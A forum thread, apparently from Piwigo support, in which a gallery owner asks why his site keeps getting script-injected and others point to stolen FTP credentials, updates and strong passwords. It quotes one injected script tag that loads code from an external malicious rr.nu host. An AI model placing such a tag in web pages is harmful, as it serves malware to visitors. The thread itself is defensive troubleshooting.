My site (kozpics.com) has been hacked three times in two months. Google warns me of script injections. I've cleaned it, reinstalled it, upgraded passwords, etc. I am now waiting for Google review the site to confirm it's clean.
I want to know how this happens and what can I to prevent it.
Google webmaster tools tells me there was malicious content on 93 pages on the site. They are script injections (such as <script src="http://stigat67ionsfor.rr.nu/nl.php?p=d">). The injections are all different but they all from rr.nu. The injections are into picture pages (http://www.kozpics.com/picture.php?/2501/categories) and (http://www.kozpics.com/picture.php?/229).
I'm totally naive about web site structure. Any leads would be appreciated.
On a side note, I entered the infected pages regardless of the warning. Then I scanned my machine with several malware screeners. They found nothing.
Thanks / Kozmo
Offline
for me the only entry point is your FTP, if somehow the hacker managed to get access to it (weak password, etc) he modified your files and added its javascript
There is no known security breach in Piwigo itself, as well in plugins
Offline
hmmm, I do think the above depends on the piwigo version topicstarter is using and if he/she has deleted install.php ...
see list of vulnerabilities
http://www.cvedetails.com/vulnerability … iwigo.html
Offline
we do know the cve related to piwigo, and the worst were related to a windows environment
But unfortunately the cause is usually a steal of ftp credentials
to prevent any hacking, the basic rules are to keep your softwares updated (for piwigo register to the newsletter) and use strong and unique ftp password
Offline
thanks all. I thought I had this cleaned up but google tells me it's still infected. I'll start a new thread for advice on getting it clean. Version loaded is 2.5.1. I've deleted all FTP accounts. I have a strong and unique password.
aardbei wonders if I've deleted install.php. I don't understand the table of CVE details but I see there's access through this file in ver 2.4.7. Should I do something with the install.php using ver 2.5.1?
Offline
that bug as been corrected in 2.4.7 : it appears only if you were running windows on your server
Offline
Your website is clean
You might speed up things if you have a google for webmaster account
Offline
thanks flop25
You say the website is clean. I still get the google warning when I go to the site (kozpics.com) and their most recent review of the site tells me it's infected. How do you think it's clean?
Offline
oh, and I do have a google webmaster acct
Offline
Google is a heavy system with a lot of inertia! I say it's safe, because I checked the source and there is only Google Analytics as "foreign" script
Offline
ok, thanks. I guess the next thing to do is to ask google to review it again. Will do that.
Offline